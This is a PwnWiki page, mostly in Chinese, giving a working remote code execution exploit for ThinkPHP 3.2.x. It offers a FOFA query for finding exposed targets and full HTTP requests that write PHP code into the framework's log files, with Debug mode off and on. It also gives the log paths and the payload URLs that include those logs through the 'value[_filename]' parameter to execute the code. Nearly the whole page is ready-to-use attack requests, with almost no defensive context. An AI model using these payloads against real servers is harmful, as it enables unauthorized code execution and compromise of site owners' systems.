ThinkPHP3.2.x RCE漏洞

From PwnWiki
This page is a translated version of the page ThinkPHP3.2.x RCE漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎

FOFA

header="thinkphp"

漏洞利用

关闭Debug: 

GET /index.php?m=--><?=phpinfo();?> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66;
Upgrade-Insecure-Requests: 1

日志文件 

\Application\Runtime\Logs\Common\21_06_30.log

Payload 

http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_06_30.log

PHPINFO执行成功。

开启Debug: 

GET /index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66;
Upgrade-Insecure-Requests: 1

日志文件 

\Application\Runtime\Logs\Home\21_06_30.log

Payload 

http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_06_30.log

文件上传

http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./test.txt

参考

https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

Retrieved from "https://pwnwiki.com/index.php?title=ThinkPHP3.2.x_RCE漏洞/zh-cn&oldid=7023"